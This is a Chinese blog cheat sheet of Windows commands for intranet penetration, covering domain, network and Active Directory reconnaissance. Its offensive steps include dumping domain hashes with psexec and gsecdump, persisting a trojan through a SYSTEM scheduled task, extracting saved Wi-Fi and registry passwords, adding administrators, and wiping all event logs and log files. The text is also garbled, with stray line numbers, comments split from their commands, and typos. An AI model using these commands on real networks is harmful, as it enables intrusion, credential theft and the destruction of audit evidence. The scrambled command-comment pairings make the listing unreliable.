内网渗透--常用命令


1.域常用操作命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
net group /domain
//获得所有域用户组列表
net group XXX /domain //显示域中XXX组的成员
net group XXX /del /domain //删除域中XXX组
net group XXX xx /del /domain //删除域内XXX群组中的成员xx
net group XXX /add /domain //增加域中的群组
net group "domain admins" /domain //获得域管理员列表
net group "enterprise admins" /domain //获得企业管理员列表
net localgroup administrators /domain
//获取域内置administrators组用(enterprise admins、domain admins)
net group "domain controllers" /domain
net group "domain computers" /domain
net user /domain
//获得域控制器列表
//获得所有域成员计算机列表
//获得所有域用户列表
net user someuser /domain
//获得指定账户someuser的详细信息
net accounts /domain
//获得域密码策略设置,密码长短,错误锁定等信息
nei view /domain //查询有几个域, 查询域列表
net view /domain:testdomain //查看 testdomain域中的计算机列表
nltest /domain_trusts //获取域信任信息
net user domain-admin /domain
//查看管理员登陆时间,密码过期时间,是否有登陆脚本,组分配等信息
net config Workstation
//查询机器属于哪个域
net time /domian
//查询主域服务器的时间
echo %logonserver% //查看登陆到这台服务器的计算机名
net time \\192.168.1.1 //查询远程共享主机192.168.1.1的时间
net use \\IP\ipc$ password /user:username@domain
net view \\dc.hacke.com
//ipc$域内连接
//查看域控共享情况
dir \dc.hacke.com\SYSVOL /s /a > sysvol.txt
//列出sysvol日志记录
xcopy \\dc.hacke.com\sysvol.txt sysvol.txt /i /e /c
//远程拷贝到本地sysvol日志
net user /domain xy xy123
//修改域内用户密码,需要管理员权限
net localgroup administartors
HACKE\XXX /add
//将HACKE域中的用户XXX添加到administrators组中
mstsc /admin
gpupdate/force
//远程桌面登录到console会话解决hash无法抓出问题
//更新域策略psexec \\192.168.1.3 -u administrator -p xy123 -c gsecdump.exe -u
//从域服务器密码存储文件windows/ntds/ntds.dit导出hash值出来
gsecdump -a
//获取域登管理员登录过得hash值,这里gescdump为第三方导出AD域的hash值
tasklist /S ip /U domain\username /P /V
gpresult /z
wevtutil el
//查看远程计算机进程列
导出组策略
列出Windows日志类型
wevtutil cl [LOGNAME]
清除特定类型日志

2.基本内网渗透命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
ipconfig/all //查看IP地址
ipconfig /release //释放地址
ipconfig /renew //重新获取Ip地址
whoami //查询账号所属权限
whoami/all //查看sid值
systeminfo //查询系统以及补丁信息
tasklist /svc //查看进程
taskkill /im/进程名称(cmd)
//结束进程
taskkill /pid[进程码] //-t(结束该进程) -f(强制结束该进程以及所有子进程)
wmic qfe get hotfixid //查看已安装过得补丁
wmic qfe list full /format:htable > hotfixes.htm
wmic qfe
//详细的补丁安装
//查询补丁信息以及微软提供的下载地址
ping hostname(主机名) //显示该机器名的IP
net start //查看当前运行的服务
net user //查看本地组的用户
net localhroup administrators
//查看本机管理员组有哪些用户
net use //查看会话
net session //查看当前会话
net share //查看SMB指向的路径[即共享]
wmic share get name,path
//查看SMB指向的路径
wmic nteventlog get path,filename,writeable //查询系统日志文件存储位置
net use \\IP\ipc$ password /user:username //建立IPC会话(工作组模式)
net use z: \\192.168.1.1
net time \\172.16.16.2
//建立映射到本机Z盘
//查询共享主机的是at \\172.16.16.2 13:50 c:\windows\xy.exe
//在共享主机上执行
netstat -ano //查看开放的端口
netstat -an | find “3389” //找到3389端口
net accounts //查看本地密码策略
nbtstat –A ip //netbiso查询
net view
//查看机器注释或许能得到当前活动状态的机器列表,如果禁用
netbios就查看不出来
echo %PROCESSOR_ARCHITECTURE%
//查看系统是32还是64位
set //查看系统环境设置变量
net start //查看当前运行的服务
wmic service list brief
wmic process list brief
wmic startup list brief
wmic product list brief
wmic startup list full
//查看进程服务
//查看进程
//查看启动程序信息
//查看安装程序和版本信息(漏洞利用线索)
//识别开机启动的程序
wmic process where(description="mysqld.exe") >>mysql.log
qwinsta
//获取软件安装路径
//查看登录情况
REG query HKCU /v "pwd" /s //获取保存到注册表中的密码

3.长命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan showprofiles') do @echo %j |
findstr -i -v echo | netsh wlan show profiles %jkey=clear
//一键获取wifi密码
if defined PSModulePath (echo 支持powershell) else (echo 不支持powershell)
//查看是否支持posershell
schtasks.exe /Create /RU"SYSTEM" /SC MINUTE /MO 45 /TN FIREWALL /TR
"c:/muma.ex
e" /ED 2017/4/7
//添加计划任务
FOR /F "eol=- tokens=1 delims=\ " %a IN('net view') DO @(echo name: %a, ip: &
ping %a -w 1 -n 1 | find /i "ttl" & echo.)
//域机器对应的IP
for /l %i in (1,1,255) do @ping -a 192.168.200.%i -w 1 -n 1 | find /i "Pinging"
//找主机名
for /l %i in (1,1,255) do @ping -a 10.0.%i.1 -w 1 -n 1 | find /i "Pinging"
//找B段(将 Pinging 改成 Ping 就可以适用于Win7)
for /f %a in ('wevtutil el') do @wevtutil cl "%a"
删除所有日志del %WINDIR%\*.log /a /s /q /f
从%WINDIR%目录中删除所有* .log文件

4.内网网络结常用命令

1
2
3
4
5
6
7
8
9
10
tracert IP //路由跟踪
route print //打印路由表
arp -a //列出本网段内所有活跃的IP地址
arp -s (ip + mac) //绑定mac与ip地址
arp -d (ip + mac) //解绑mac与ip地址
netsh firewall show config //查看防火墙策略

netsh firewall show state //查看防火墙策略


5.dsquer y的AD查询工具

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
dsquery user domainroot -limit 65535 && net user /domain
//列出该域内所有用
户名
dsquery server -domain hacke.com | dsget server -dnsname -site
//搜索域内所有域
控制器并显示他们的DNS主机名和站点名称
dsquery contact //寻找目录中的联系人
dsquery subnet //列出该域内网段划分
query user
//查询那些用户在线
dsquery group && net group /domain
dsquery ou
//列出该域内分组
//列出该域内组织单位
dsquery server && net time /domain
dsquery site -o rdn
//列出该域内域控制器
//搜索域中所有站点的名称
dsquery group dc=super,dc=com |more
//搜索在DC=SUPER,DC=COM 域中的所
有组
psloggedon.exe
netsess.exe
//192.168.1.115
//查询那台主机和用户登录到该主机上
//远程主机上无需管理员权限,查询到主机名和
用户
reg query "HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\TERMINAL
SERVERCLIENT\DEFAULT" //获取最近mstsc登录的记录

6.DOS常用快捷命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
mspaint
calc
画图工具
计算器
notepad 记事本
taskmgr 任务管理器osk
打开屏幕键盘
gpedit.msc
组策略
services.msc
本地服务
compmgmt.msc
devmgmt.msc
winver
magnify
eventvwr
计算机管理
设备管理器
查看系统版本
放大镜实用程序
事件查看器
Regedit 打开注册表
resmon 资源监视器
WMIC BIOS get releasedate
mstsc -f
查看电脑生产日期
远程连接(可以全屏)
echo %COMSPEC%%
fsutil fsinfo drives
当前cmd环境变量
列出所有驱动器名


文章作者: thirteensummer
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 thirteensummer !
  目录